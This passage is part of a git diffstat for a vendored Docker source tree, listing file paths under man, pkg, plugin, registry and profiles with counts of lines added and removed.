| 139 +- .../docker/libcontainerd/types_linux.go | 57 +- .../docker/libcontainerd/types_solaris.go | 43 - .../docker/libcontainerd/types_windows.go | 71 +- .../docker/libcontainerd/utils_linux.go | 62 +- .../docker/libcontainerd/utils_solaris.go | 27 - .../docker/libcontainerd/utils_windows.go | 48 +- 
.../libcontainerd/utils_windows_test.go | 2 +- .../github.com/docker/docker/man/Dockerfile | 24 - .../docker/docker/man/Dockerfile.5.md | 474 -- .../docker/docker/man/Dockerfile.aarch64 | 25 - .../docker/docker/man/Dockerfile.armhf | 43 - .../docker/docker/man/Dockerfile.ppc64le | 35 - .../docker/docker/man/Dockerfile.s390x | 35 - vendor/github.com/docker/docker/man/README.md | 15 - .../docker/docker/man/docker-attach.1.md | 99 - .../docker/docker/man/docker-build.1.md | 340 - .../docker/docker/man/docker-commit.1.md | 71 - .../docker/docker/man/docker-config-json.5.md | 72 - .../docker/docker/man/docker-cp.1.md | 175 - .../docker/docker/man/docker-create.1.md | 553 -- .../docker/docker/man/docker-diff.1.md | 49 - .../docker/docker/man/docker-events.1.md | 180 - .../docker/docker/man/docker-exec.1.md | 71 - .../docker/docker/man/docker-export.1.md | 46 - .../docker/docker/man/docker-history.1.md | 52 - .../docker/docker/man/docker-images.1.md | 153 - .../docker/docker/man/docker-import.1.md | 72 - .../docker/docker/man/docker-info.1.md | 187 - .../docker/docker/man/docker-inspect.1.md | 323 - .../docker/docker/man/docker-kill.1.md | 28 - .../docker/docker/man/docker-load.1.md | 56 - .../docker/docker/man/docker-login.1.md | 53 - .../docker/docker/man/docker-logout.1.md | 32 - .../docker/docker/man/docker-logs.1.md | 71 - .../docker/man/docker-network-connect.1.md | 66 - .../docker/man/docker-network-create.1.md | 187 - .../docker/man/docker-network-disconnect.1.md | 36 - .../docker/man/docker-network-inspect.1.md | 112 - .../docker/docker/man/docker-network-ls.1.md | 188 - .../docker/docker/man/docker-network-rm.1.md | 43 - .../docker/docker/man/docker-pause.1.md | 32 - .../docker/docker/man/docker-port.1.md | 47 - .../docker/docker/man/docker-ps.1.md | 145 - .../docker/docker/man/docker-pull.1.md | 220 - .../docker/docker/man/docker-push.1.md | 63 - .../docker/docker/man/docker-rename.1.md | 15 - .../docker/docker/man/docker-restart.1.md | 26 - 
.../docker/docker/man/docker-rm.1.md | 72 - .../docker/docker/man/docker-rmi.1.md | 42 - .../docker/docker/man/docker-run.1.md | 1055 --- .../docker/docker/man/docker-save.1.md | 45 - .../docker/docker/man/docker-search.1.md | 70 - .../docker/docker/man/docker-start.1.md | 39 - .../docker/docker/man/docker-stats.1.md | 57 - .../docker/docker/man/docker-stop.1.md | 30 - .../docker/docker/man/docker-tag.1.md | 76 - .../docker/docker/man/docker-top.1.md | 36 - .../docker/docker/man/docker-unpause.1.md | 28 - .../docker/docker/man/docker-update.1.md | 171 - .../docker/docker/man/docker-version.1.md | 62 - .../docker/docker/man/docker-wait.1.md | 30 - .../github.com/docker/docker/man/docker.1.md | 237 - .../github.com/docker/docker/man/dockerd.8.md | 710 -- .../github.com/docker/docker/man/generate.go | 43 - .../github.com/docker/docker/man/generate.sh | 15 - .../github.com/docker/docker/man/glide.lock | 52 - .../github.com/docker/docker/man/glide.yaml | 12 - .../docker/docker/man/md2man-all.sh | 22 - .../docker/docker/migrate/v1/migratev1.go | 41 +- .../docker/migrate/v1/migratev1_test.go | 31 +- .../oci/{defaults_linux.go => defaults.go} | 129 +- .../docker/docker/oci/defaults_solaris.go | 20 - .../docker/docker/oci/defaults_windows.go | 19 - .../docker/docker/oci/devices_linux.go | 20 +- .../docker/docker/oci/devices_unsupported.go | 6 +- .../docker/docker/oci/namespaces.go | 13 +- .../docker/docker/opts/address_pools.go | 84 + .../docker/docker/opts/address_pools_test.go | 20 + vendor/github.com/docker/docker/opts/env.go | 48 + .../github.com/docker/docker/opts/env_test.go | 124 + vendor/github.com/docker/docker/opts/hosts.go | 30 +- .../docker/docker/opts/hosts_test.go | 39 +- .../docker/docker/opts/hosts_unix.go | 2 +- .../docker/docker/opts/hosts_windows.go | 4 +- vendor/github.com/docker/docker/opts/ip.go | 4 +- .../github.com/docker/docker/opts/ip_test.go | 2 +- vendor/github.com/docker/docker/opts/mount.go | 171 - .../docker/docker/opts/mount_test.go | 184 - 
vendor/github.com/docker/docker/opts/opts.go | 159 +- .../docker/docker/opts/opts_test.go | 50 +- .../docker/docker/opts/opts_unix.go | 4 +- .../docker/docker/opts/opts_windows.go | 4 +- vendor/github.com/docker/docker/opts/port.go | 146 - .../docker/docker/opts/port_test.go | 259 - .../docker/docker/opts/quotedstring.go | 4 +- .../docker/docker/opts/quotedstring_test.go | 20 +- .../docker/{runconfig => }/opts/runtime.go | 2 +- .../github.com/docker/docker/opts/secret.go | 107 - .../docker/docker/opts/secret_test.go | 79 - .../docker/{runconfig => }/opts/ulimit.go | 26 +- .../{runconfig => }/opts/ulimit_test.go | 2 +- vendor/github.com/docker/docker/pkg/README.md | 6 +- .../docker/docker/pkg/aaparser/aaparser.go | 16 +- .../docker/pkg/aaparser/aaparser_test.go | 2 +- .../docker/docker/pkg/archive/archive.go | 562 +- .../docker/pkg/archive/archive_linux.go | 13 +- .../docker/pkg/archive/archive_linux_test.go | 105 +- .../docker/pkg/archive/archive_other.go | 2 +- .../docker/docker/pkg/archive/archive_test.go | 342 +- .../docker/docker/pkg/archive/archive_unix.go | 54 +- .../docker/pkg/archive/archive_unix_test.go | 233 +- .../docker/pkg/archive/archive_windows.go | 27 +- .../pkg/archive/archive_windows_test.go | 6 +- .../docker/docker/pkg/archive/changes.go | 17 +- .../docker/pkg/archive/changes_linux.go | 13 +- .../docker/pkg/archive/changes_other.go | 2 +- .../docker/pkg/archive/changes_posix_test.go | 9 +- .../docker/docker/pkg/archive/changes_test.go | 314 +- .../docker/docker/pkg/archive/changes_unix.go | 9 +- .../docker/pkg/archive/changes_windows.go | 8 +- .../docker/docker/pkg/archive/copy.go | 68 +- .../docker/docker/pkg/archive/copy_unix.go | 2 +- .../docker/pkg/archive/copy_unix_test.go | 116 +- .../docker/docker/pkg/archive/copy_windows.go | 2 +- .../docker/docker/pkg/archive/diff.go | 41 +- .../docker/docker/pkg/archive/diff_test.go | 2 +- .../docker/pkg/archive/example_changes.go | 2 +- .../docker/docker/pkg/archive/time_linux.go | 4 +- 
.../docker/pkg/archive/time_unsupported.go | 2 +- .../docker/docker/pkg/archive/utils_test.go | 2 +- .../docker/docker/pkg/archive/whiteouts.go | 2 +- .../docker/docker/pkg/archive/wrap.go | 2 +- .../docker/docker/pkg/archive/wrap_test.go | 20 +- .../docker/docker/pkg/authorization/api.go | 4 +- .../docker/pkg/authorization/api_test.go | 76 + .../docker/docker/pkg/authorization/authz.go | 19 +- .../pkg/authorization/authz_unix_test.go | 64 +- .../docker/pkg/authorization/middleware.go | 40 +- .../pkg/authorization/middleware_test.go | 53 + .../pkg/authorization/middleware_unix_test.go | 66 + .../docker/docker/pkg/authorization/plugin.go | 22 +- .../docker/pkg/authorization/response.go | 17 +- .../docker/pkg/broadcaster/unbuffered.go | 2 +- .../docker/pkg/broadcaster/unbuffered_test.go | 3 +- .../docker/pkg/chrootarchive/archive.go | 52 +- .../docker/pkg/chrootarchive/archive_test.go | 71 +- .../docker/pkg/chrootarchive/archive_unix.go | 4 +- .../pkg/chrootarchive/archive_windows.go | 2 +- .../docker/pkg/chrootarchive/chroot_linux.go | 29 +- .../docker/pkg/chrootarchive/chroot_unix.go | 8 +- .../docker/docker/pkg/chrootarchive/diff.go | 2 +- .../docker/pkg/chrootarchive/diff_unix.go | 4 +- .../docker/pkg/chrootarchive/diff_windows.go | 4 +- .../docker/pkg/chrootarchive/init_unix.go | 2 +- .../docker/pkg/chrootarchive/init_windows.go | 2 +- .../docker/docker/pkg/containerfs/archiver.go | 203 + .../docker/pkg/containerfs/containerfs.go | 87 + .../pkg/containerfs/containerfs_unix.go | 10 + .../pkg/containerfs/containerfs_windows.go | 15 + .../docker/pkg/devicemapper/devmapper.go | 96 +- .../docker/pkg/devicemapper/devmapper_log.go | 99 +- .../pkg/devicemapper/devmapper_wrapper.go | 35 +- .../devicemapper/devmapper_wrapper_dynamic.go | 6 + ...mapper_wrapper_dynamic_deferred_remove.go} | 9 +- ...r_wrapper_dynamic_dlsym_deferred_remove.go | 128 + .../devmapper_wrapper_no_deferred_remove.go | 8 +- .../docker/docker/pkg/devicemapper/ioctl.go | 11 +- 
.../docker/docker/pkg/devicemapper/log.go | 2 +- .../docker/docker/pkg/directory/directory.go | 2 +- .../docker/pkg/directory/directory_test.go | 17 +- .../docker/pkg/directory/directory_unix.go | 16 +- .../docker/pkg/directory/directory_windows.go | 13 +- .../docker/docker/pkg/discovery/README.md | 6 +- .../docker/docker/pkg/discovery/backends.go | 4 +- .../docker/docker/pkg/discovery/discovery.go | 2 +- .../docker/pkg/discovery/discovery_test.go | 2 +- .../docker/docker/pkg/discovery/entry.go | 2 +- .../docker/docker/pkg/discovery/file/file.go | 2 +- .../docker/pkg/discovery/file/file_test.go | 2 +- .../docker/docker/pkg/discovery/generator.go | 2 +- .../docker/pkg/discovery/generator_test.go | 2 +- .../docker/docker/pkg/discovery/kv/kv.go | 4 +- .../docker/docker/pkg/discovery/kv/kv_test.go | 4 +- .../docker/pkg/discovery/memory/memory.go | 2 +- .../pkg/discovery/memory/memory_test.go | 2 +- .../docker/pkg/discovery/nodes/nodes.go | 2 +- .../docker/pkg/discovery/nodes/nodes_test.go | 2 +- .../docker/docker/pkg/dmesg/dmesg_linux.go | 18 + .../docker/pkg/dmesg/dmesg_linux_test.go | 9 + .../docker/pkg/filenotify/filenotify.go | 2 +- .../docker/docker/pkg/filenotify/fsnotify.go | 4 +- .../docker/docker/pkg/filenotify/poller.go | 12 +- .../docker/pkg/filenotify/poller_test.go | 6 +- .../docker/docker/pkg/fileutils/fileutils.go | 209 +- .../docker/pkg/fileutils/fileutils_darwin.go | 2 +- .../docker/pkg/fileutils/fileutils_solaris.go | 7 - .../docker/pkg/fileutils/fileutils_test.go | 142 +- .../docker/pkg/fileutils/fileutils_unix.go | 4 +- .../docker/pkg/fileutils/fileutils_windows.go | 2 +- .../docker/pkg/fsutils/fsutils_linux.go | 23 +- .../docker/pkg/fsutils/fsutils_linux_test.go | 9 +- .../docker/docker/pkg/gitutils/gitutils.go | 100 - .../docker/pkg/gitutils/gitutils_test.go | 220 - .../docker/pkg/graphdb/conn_sqlite3_linux.go | 19 - .../docker/pkg/graphdb/graphdb_linux.go | 551 -- .../docker/pkg/graphdb/graphdb_linux_test.go | 721 -- 
.../docker/docker/pkg/graphdb/sort_linux.go | 27 - .../docker/pkg/graphdb/sort_linux_test.go | 29 - .../docker/docker/pkg/graphdb/unsupported.go | 3 - .../docker/docker/pkg/graphdb/utils_linux.go | 32 - .../docker/pkg/homedir/homedir_linux.go | 21 + .../docker/pkg/homedir/homedir_others.go | 13 + .../docker/docker/pkg/homedir/homedir_test.go | 2 +- .../homedir/{homedir.go => homedir_unix.go} | 13 +- .../docker/pkg/homedir/homedir_windows.go | 24 + .../docker/docker/pkg/httputils/httputils.go | 56 - .../docker/pkg/httputils/httputils_test.go | 115 - .../docker/pkg/httputils/mimetype_test.go | 13 - .../docker/docker/pkg/idtools/idtools.go | 149 +- .../docker/docker/pkg/idtools/idtools_unix.go | 53 +- .../docker/pkg/idtools/idtools_unix_test.go | 224 +- .../docker/pkg/idtools/idtools_windows.go | 8 +- .../docker/pkg/idtools/usergroupadd_linux.go | 2 +- .../pkg/idtools/usergroupadd_unsupported.go | 2 +- .../docker/docker/pkg/idtools/utils_unix.go | 2 +- .../docker/pkg/integration/cmd/command.go | 294 - .../pkg/integration/cmd/command_test.go | 118 - .../docker/docker/pkg/integration/utils.go | 227 - .../docker/pkg/integration/utils_test.go | 363 - .../docker/docker/pkg/ioutils/buffer.go | 2 +- .../docker/docker/pkg/ioutils/buffer_test.go | 80 +- .../docker/docker/pkg/ioutils/bytespipe.go | 2 +- .../docker/pkg/ioutils/bytespipe_test.go | 2 +- .../docker/docker/pkg/ioutils/fmt.go | 22 - .../docker/docker/pkg/ioutils/fmt_test.go | 17 - .../docker/docker/pkg/ioutils/fswriters.go | 2 +- .../docker/pkg/ioutils/fswriters_test.go | 6 +- .../docker/docker/pkg/ioutils/readers.go | 15 +- .../docker/docker/pkg/ioutils/readers_test.go | 15 +- .../docker/docker/pkg/ioutils/temp_unix.go | 2 +- .../docker/docker/pkg/ioutils/temp_windows.go | 4 +- .../docker/docker/pkg/ioutils/writeflusher.go | 2 +- .../docker/docker/pkg/ioutils/writers.go | 2 +- .../docker/docker/pkg/ioutils/writers_test.go | 2 +- .../docker/docker/pkg/jsonlog/jsonlog.go | 42 - 
.../docker/pkg/jsonlog/jsonlog_marshalling.go | 178 - .../pkg/jsonlog/jsonlog_marshalling_test.go | 34 - .../docker/pkg/jsonlog/jsonlogbytes_test.go | 39 - .../docker/pkg/jsonlog/time_marshalling.go | 27 - .../pkg/jsonlog/time_marshalling_test.go | 47 - .../docker/pkg/jsonmessage/jsonmessage.go | 182 +- .../pkg/jsonmessage/jsonmessage_test.go | 195 +- .../docker/pkg/listeners/listeners_solaris.go | 31 - .../docker/docker/pkg/locker/README.md | 10 +- .../docker/docker/pkg/locker/locker.go | 2 +- .../docker/docker/pkg/locker/locker_test.go | 39 +- .../docker/docker/pkg/longpath/longpath.go | 2 +- .../docker/pkg/longpath/longpath_test.go | 2 +- .../docker/pkg/loopback/attach_loopback.go | 10 +- .../docker/docker/pkg/loopback/ioctl.go | 29 +- .../docker/pkg/loopback/loop_wrapper.go | 4 +- .../docker/docker/pkg/loopback/loopback.go | 15 +- .../docker/docker/pkg/mount/flags.go | 2 +- .../docker/docker/pkg/mount/flags_freebsd.go | 3 +- .../docker/docker/pkg/mount/flags_linux.go | 50 +- .../docker/pkg/mount/flags_unsupported.go | 5 +- .../docker/docker/pkg/mount/mount.go | 129 +- .../docker/pkg/mount/mount_unix_test.go | 14 +- .../docker/pkg/mount/mounter_freebsd.go | 7 +- .../docker/docker/pkg/mount/mounter_linux.go | 54 +- .../docker/pkg/mount/mounter_linux_test.go | 228 + .../docker/pkg/mount/mounter_solaris.go | 33 - .../docker/pkg/mount/mounter_unsupported.go | 4 +- .../docker/docker/pkg/mount/mountinfo.go | 2 +- .../docker/pkg/mount/mountinfo_freebsd.go | 18 +- .../docker/pkg/mount/mountinfo_linux.go | 153 +- .../docker/pkg/mount/mountinfo_linux_test.go | 156 +- .../docker/pkg/mount/mountinfo_solaris.go | 37 - .../docker/pkg/mount/mountinfo_unsupported.go | 6 +- .../docker/pkg/mount/mountinfo_windows.go | 4 +- .../docker/pkg/mount/sharedsubtree_linux.go | 4 +- .../pkg/mount/sharedsubtree_linux_test.go | 23 +- .../docker/pkg/mount/sharedsubtree_solaris.go | 58 - .../cmd/names-generator/main.go | 3 + .../pkg/namesgenerator/names-generator.go | 69 +- 
.../namesgenerator/names-generator_test.go | 2 +- .../docker/pkg/parsers/kernel/kernel.go | 2 +- .../pkg/parsers/kernel/kernel_darwin.go | 2 +- .../docker/pkg/parsers/kernel/kernel_unix.go | 18 +- .../pkg/parsers/kernel/kernel_unix_test.go | 2 +- .../pkg/parsers/kernel/kernel_windows.go | 42 +- .../docker/pkg/parsers/kernel/uname_linux.go | 16 +- .../pkg/parsers/kernel/uname_solaris.go | 2 +- .../pkg/parsers/kernel/uname_unsupported.go | 4 +- .../operatingsystem/operatingsystem_linux.go | 2 +- .../operatingsystem_solaris.go | 37 - .../operatingsystem/operatingsystem_unix.go | 2 +- .../operatingsystem_unix_test.go | 2 +- .../operatingsystem_windows.go | 54 +- .../docker/docker/pkg/parsers/parsers.go | 2 +- .../docker/docker/pkg/parsers/parsers_test.go | 2 +- .../docker/docker/pkg/pidfile/pidfile.go | 9 +- .../docker/pkg/pidfile/pidfile_darwin.go | 12 +- .../docker/docker/pkg/pidfile/pidfile_test.go | 2 +- .../docker/docker/pkg/pidfile/pidfile_unix.go | 2 +- .../docker/pkg/pidfile/pidfile_windows.go | 12 +- .../docker/pkg/platform/architecture_linux.go | 12 +- .../docker/pkg/platform/architecture_unix.go | 4 +- .../pkg/platform/architecture_windows.go | 2 +- .../docker/docker/pkg/platform/platform.go | 4 +- .../docker/pkg/platform/utsname_int8.go | 18 - .../docker/pkg/platform/utsname_uint8.go | 18 - .../docker/docker/pkg/plugingetter/getter.go | 39 +- .../docker/docker/pkg/plugins/client.go | 67 +- .../docker/docker/pkg/plugins/client_test.go | 153 +- .../docker/docker/pkg/plugins/discovery.go | 63 +- .../docker/pkg/plugins/discovery_test.go | 4 +- .../docker/pkg/plugins/discovery_unix.go | 2 +- .../docker/pkg/plugins/discovery_unix_test.go | 102 +- .../docker/pkg/plugins/discovery_windows.go | 2 +- .../docker/docker/pkg/plugins/errors.go | 2 +- .../docker/docker/pkg/plugins/plugin_test.go | 114 +- .../pkg/plugins/pluginrpc-gen/README.md | 2 +- .../pkg/plugins/pluginrpc-gen/fixtures/foo.go | 8 +- .../fixtures/otherfixture/spaceship.go | 2 +- 
.../pkg/plugins/pluginrpc-gen/parser_test.go | 2 +- .../docker/docker/pkg/plugins/plugins.go | 12 +- .../docker/pkg/plugins/plugins_linux.go | 7 - .../docker/docker/pkg/plugins/plugins_unix.go | 9 + .../docker/pkg/plugins/plugins_windows.go | 11 +- .../docker/pkg/plugins/transport/http.go | 2 +- .../docker/pkg/plugins/transport/http_test.go | 21 + .../docker/pkg/plugins/transport/transport.go | 2 +- .../docker/docker/pkg/pools/pools.go | 33 +- .../docker/docker/pkg/pools/pools_test.go | 28 +- .../docker/docker/pkg/progress/progress.go | 7 +- .../docker/pkg/progress/progressreader.go | 2 +- .../pkg/progress/progressreader_test.go | 4 +- .../docker/docker/pkg/promise/promise.go | 11 - .../docker/docker/pkg/pubsub/publisher.go | 12 +- .../docker/pkg/pubsub/publisher_test.go | 10 +- .../docker/docker/pkg/random/random.go | 71 - .../docker/docker/pkg/random/random_test.go | 22 - .../docker/docker/pkg/reexec/README.md | 2 +- .../docker/docker/pkg/reexec/command_linux.go | 8 +- .../docker/docker/pkg/reexec/command_unix.go | 4 +- .../docker/pkg/reexec/command_unsupported.go | 6 +- .../docker/pkg/reexec/command_windows.go | 4 +- .../docker/docker/pkg/reexec/reexec.go | 2 +- .../docker/docker/pkg/reexec/reexec_test.go | 52 + .../docker/docker/pkg/registrar/registrar.go | 127 - .../docker/pkg/registrar/registrar_test.go | 119 - .../docker/docker/pkg/signal/signal.go | 4 +- .../docker/docker/pkg/signal/signal_darwin.go | 2 +- .../docker/pkg/signal/signal_freebsd.go | 2 +- .../docker/docker/pkg/signal/signal_linux.go | 73 +- .../docker/pkg/signal/signal_linux_test.go | 59 + .../docker/pkg/signal/signal_solaris.go | 42 - .../docker/docker/pkg/signal/signal_test.go | 34 + .../docker/docker/pkg/signal/signal_unix.go | 2 +- .../docker/pkg/signal/signal_unsupported.go | 4 +- .../docker/pkg/signal/signal_windows.go | 4 +- .../docker/pkg/signal/testfiles/main.go | 43 + .../docker/docker/pkg/signal/trap.go | 13 +- .../docker/pkg/signal/trap_linux_test.go | 82 + 
.../docker/docker/pkg/stdcopy/stdcopy.go | 20 +- .../docker/docker/pkg/stdcopy/stdcopy_test.go | 35 +- .../pkg/streamformatter/streamformatter.go | 189 +- .../streamformatter/streamformatter_test.go | 152 +- .../pkg/streamformatter/streamwriter.go | 47 + .../pkg/streamformatter/streamwriter_test.go | 35 + .../docker/docker/pkg/stringid/stringid.go | 54 +- .../docker/pkg/stringid/stringid_test.go | 2 +- .../docker/docker/pkg/stringutils/README.md | 1 - .../docker/pkg/stringutils/stringutils.go | 101 - .../pkg/stringutils/stringutils_test.go | 121 - .../docker/docker/pkg/symlink/LICENSE.APACHE | 2 +- .../docker/docker/pkg/symlink/LICENSE.BSD | 2 +- .../docker/docker/pkg/symlink/fs.go | 4 +- .../docker/docker/pkg/symlink/fs_unix.go | 2 +- .../docker/docker/pkg/symlink/fs_unix_test.go | 2 +- .../docker/docker/pkg/symlink/fs_windows.go | 22 +- .../docker/docker/pkg/sysinfo/numcpu.go | 2 +- .../docker/docker/pkg/sysinfo/numcpu_linux.go | 11 +- .../docker/pkg/sysinfo/numcpu_windows.go | 4 +- .../docker/docker/pkg/sysinfo/sysinfo.go | 2 +- .../docker/pkg/sysinfo/sysinfo_linux.go | 15 +- .../docker/pkg/sysinfo/sysinfo_linux_test.go | 76 +- .../docker/pkg/sysinfo/sysinfo_solaris.go | 121 - .../docker/docker/pkg/sysinfo/sysinfo_test.go | 2 +- .../docker/docker/pkg/sysinfo/sysinfo_unix.go | 6 +- .../docker/pkg/sysinfo/sysinfo_windows.go | 4 +- .../docker/docker/pkg/system/chtimes.go | 25 +- .../docker/docker/pkg/system/chtimes_test.go | 2 +- .../docker/docker/pkg/system/chtimes_unix.go | 2 +- .../docker/pkg/system/chtimes_unix_test.go | 2 +- .../docker/pkg/system/chtimes_windows.go | 23 +- .../docker/pkg/system/chtimes_windows_test.go | 2 +- .../docker/docker/pkg/system/errors.go | 5 +- .../docker/pkg/system/events_windows.go | 85 - .../docker/docker/pkg/system/exitcode.go | 16 +- .../docker/docker/pkg/system/filesys.go | 27 +- .../docker/pkg/system/filesys_windows.go | 172 +- .../docker/docker/pkg/system/init.go | 22 + .../docker/docker/pkg/system/init_unix.go | 7 + 
.../docker/docker/pkg/system/init_windows.go | 12 + .../docker/docker/pkg/system/lcow.go | 69 + .../docker/docker/pkg/system/lcow_unix.go | 8 + .../docker/docker/pkg/system/lcow_windows.go | 6 + .../pkg/system/{lstat.go => lstat_unix.go} | 2 +- .../docker/pkg/system/lstat_unix_test.go | 2 +- .../docker/docker/pkg/system/lstat_windows.go | 17 +- .../docker/docker/pkg/system/meminfo.go | 2 +- .../docker/docker/pkg/system/meminfo_linux.go | 2 +- .../docker/pkg/system/meminfo_solaris.go | 128 - .../docker/pkg/system/meminfo_unix_test.go | 2 +- .../docker/pkg/system/meminfo_unsupported.go | 4 +- .../docker/pkg/system/meminfo_windows.go | 2 +- .../docker/docker/pkg/system/mknod.go | 8 +- .../docker/docker/pkg/system/mknod_windows.go | 4 +- .../docker/docker/pkg/system/path.go | 60 + .../docker/docker/pkg/system/path_unix.go | 14 - .../docker/docker/pkg/system/path_windows.go | 37 - .../docker/pkg/system/path_windows_test.go | 27 +- .../{utils => pkg/system}/process_unix.go | 12 +- .../docker/pkg/system/process_windows.go | 18 + .../github.com/docker/docker/pkg/system/rm.go | 80 + .../docker/docker/pkg/system/rm_test.go | 84 + .../docker/docker/pkg/system/stat_darwin.go | 25 +- .../docker/docker/pkg/system/stat_freebsd.go | 18 +- .../docker/docker/pkg/system/stat_linux.go | 22 +- .../docker/docker/pkg/system/stat_openbsd.go | 8 +- .../docker/docker/pkg/system/stat_solaris.go | 27 +- .../pkg/system/{stat.go => stat_unix.go} | 20 +- .../docker/pkg/system/stat_unix_test.go | 9 +- .../docker/pkg/system/stat_unsupported.go | 17 - .../docker/docker/pkg/system/stat_windows.go | 48 +- .../docker/docker/pkg/system/syscall_unix.go | 6 +- .../docker/pkg/system/syscall_windows.go | 42 +- .../docker/pkg/system/syscall_windows_test.go | 2 +- .../docker/docker/pkg/system/umask.go | 6 +- .../docker/docker/pkg/system/umask_windows.go | 4 +- .../docker/pkg/system/utimes_freebsd.go | 10 +- .../docker/docker/pkg/system/utimes_linux.go | 15 +- .../docker/pkg/system/utimes_unix_test.go | 2 +- 
.../docker/pkg/system/utimes_unsupported.go | 2 +- .../docker/docker/pkg/system/xattrs_linux.go | 50 +- .../docker/pkg/system/xattrs_unsupported.go | 2 +- .../docker/docker/pkg/tailfile/tailfile.go | 4 +- .../docker/pkg/tailfile/tailfile_test.go | 2 +- .../docker/pkg/tarsum/builder_context.go | 2 +- .../docker/pkg/tarsum/builder_context_test.go | 2 +- .../docker/docker/pkg/tarsum/fileinfosums.go | 13 +- .../docker/pkg/tarsum/fileinfosums_test.go | 6 +- .../docker/docker/pkg/tarsum/tarsum.go | 26 +- .../docker/docker/pkg/tarsum/tarsum_test.go | 45 +- .../docker/docker/pkg/tarsum/versioning.go | 10 +- .../docker/pkg/tarsum/versioning_test.go | 2 +- .../docker/docker/pkg/tarsum/writercloser.go | 2 +- .../docker/docker/pkg/term/ascii.go | 4 +- .../docker/docker/pkg/term/ascii_test.go | 48 +- .../docker/docker/pkg/term/proxy.go | 78 + .../docker/docker/pkg/term/proxy_test.go | 115 + .../github.com/docker/docker/pkg/term/tc.go | 20 + .../docker/docker/pkg/term/tc_linux_cgo.go | 50 - .../docker/docker/pkg/term/tc_other.go | 20 - .../docker/docker/pkg/term/tc_solaris_cgo.go | 63 - .../github.com/docker/docker/pkg/term/term.go | 9 +- .../docker/docker/pkg/term/term_linux_test.go | 117 + .../docker/docker/pkg/term/term_solaris.go | 41 - .../docker/docker/pkg/term/term_unix.go | 29 - .../docker/docker/pkg/term/term_windows.go | 53 +- .../docker/docker/pkg/term/termios_bsd.go | 42 + .../docker/docker/pkg/term/termios_darwin.go | 69 - .../docker/docker/pkg/term/termios_freebsd.go | 69 - .../docker/docker/pkg/term/termios_linux.go | 42 +- .../docker/docker/pkg/term/termios_openbsd.go | 69 - .../docker/pkg/term/windows/ansi_reader.go | 2 +- .../docker/pkg/term/windows/ansi_writer.go | 2 +- .../docker/docker/pkg/term/windows/console.go | 2 +- .../docker/docker/pkg/term/windows/windows.go | 6 +- .../docker/pkg/term/windows/windows_test.go | 2 +- .../docker/docker/pkg/term/winsize.go | 20 + .../docker/pkg/testutil/assert/assert.go | 97 - .../docker/docker/pkg/testutil/pkg.go | 1 - 
.../docker/pkg/testutil/tempfile/tempfile.go | 36 - .../docker/pkg/tlsconfig/tlsconfig_clone.go | 11 - .../pkg/tlsconfig/tlsconfig_clone_go16.go | 31 - .../pkg/tlsconfig/tlsconfig_clone_go17.go | 33 - .../docker/pkg/truncindex/truncindex.go | 14 +- .../docker/pkg/truncindex/truncindex_test.go | 28 +- .../docker/docker/pkg/urlutil/urlutil.go | 18 +- .../docker/docker/pkg/urlutil/urlutil_test.go | 24 +- .../docker/docker/pkg/useragent/useragent.go | 2 +- .../docker/pkg/useragent/useragent_test.go | 2 +- .../docker/docker/plugin/backend_linux.go | 250 +- .../docker/plugin/backend_linux_test.go | 81 + .../docker/plugin/backend_unsupported.go | 11 +- .../docker/docker/plugin/blobstore.go | 27 +- .../github.com/docker/docker/plugin/defs.go | 30 +- .../github.com/docker/docker/plugin/errors.go | 66 + .../github.com/docker/docker/plugin/events.go | 111 + .../plugin/executor/containerd/containerd.go | 175 + .../executor/containerd/containerd_test.go | 148 + .../docker/docker/plugin/manager.go | 229 +- .../docker/docker/plugin/manager_linux.go | 149 +- .../docker/plugin/manager_linux_test.go | 279 + .../docker/docker/plugin/manager_solaris.go | 28 - .../docker/docker/plugin/manager_test.go | 55 + .../docker/docker/plugin/manager_windows.go | 6 +- .../github.com/docker/docker/plugin/store.go | 132 +- .../docker/docker/plugin/store_test.go | 41 +- .../docker/docker/plugin/v2/plugin.go | 97 +- .../docker/docker/plugin/v2/plugin_linux.go | 50 +- .../docker/plugin/v2/plugin_unsupported.go | 4 +- .../docker/docker/plugin/v2/settable.go | 2 +- .../docker/docker/plugin/v2/settable_test.go | 4 +- vendor/github.com/docker/docker/poule.yml | 55 +- .../docker/profiles/apparmor/apparmor.go | 18 +- .../docker/profiles/apparmor/template.go | 4 +- .../docker/profiles/seccomp/default.json | 57 +- .../docker/docker/profiles/seccomp/seccomp.go | 46 +- .../profiles/seccomp/seccomp_default.go | 50 +- .../docker/profiles/seccomp/seccomp_test.go | 2 +- .../profiles/seccomp/seccomp_unsupported.go | 
5 +- .../github.com/docker/docker/project/ARM.md | 6 +- .../{CONTRIBUTORS.md => CONTRIBUTING.md} | 0 .../docker/docker/project/GOVERNANCE.md | 127 +- .../docker/docker/project/ISSUE-TRIAGE.md | 6 +- .../project/PACKAGE-REPO-MAINTENANCE.md | 2 +- .../docker/docker/project/PACKAGERS.md | 2 +- .../docker/docker/project/README.md | 2 +- .../docker/project/RELEASE-CHECKLIST.md | 518 -- .../docker/docker/project/RELEASE-PROCESS.md | 2 +- .../docker/docker/project/REVIEWING.md | 2 +- .../github.com/docker/docker/project/TOOLS.md | 2 +- .../docker/docker/reference/errors.go | 25 + .../docker/docker/reference/reference.go | 216 - .../docker/docker/reference/reference_test.go | 275 - .../docker/docker/reference/store.go | 165 +- .../docker/docker/reference/store_test.go | 72 +- .../github.com/docker/docker/registry/auth.go | 67 +- .../docker/docker/registry/auth_test.go | 6 +- .../docker/docker/registry/config.go | 235 +- .../docker/docker/registry/config_test.go | 338 +- .../docker/docker/registry/config_unix.go | 11 +- .../docker/docker/registry/config_windows.go | 9 +- .../docker/docker/registry/endpoint_test.go | 2 +- .../docker/docker/registry/endpoint_v1.go | 16 +- .../docker/docker/registry/errors.go | 31 + .../docker/docker/registry/registry.go | 10 +- .../docker/registry/registry_mock_test.go | 12 +- .../docker/docker/registry/registry_test.go | 119 +- .../resumable}/resumablerequestreader.go | 31 +- .../resumable}/resumablerequestreader_test.go | 142 +- .../docker/docker/registry/service.go | 70 +- .../docker/docker/registry/service_v1.go | 2 +- .../docker/docker/registry/service_v1_test.go | 15 +- .../docker/docker/registry/service_v2.go | 16 +- .../docker/docker/registry/session.go | 88 +- .../docker/docker/registry/types.go | 11 +- .../docker/docker/reports/2017-05-01.md | 35 + .../docker/docker/reports/2017-05-08.md | 34 + .../docker/docker/reports/2017-05-15.md | 52 + .../docker/docker/reports/2017-06-05.md | 36 + .../docker/docker/reports/2017-06-12.md | 78 + 
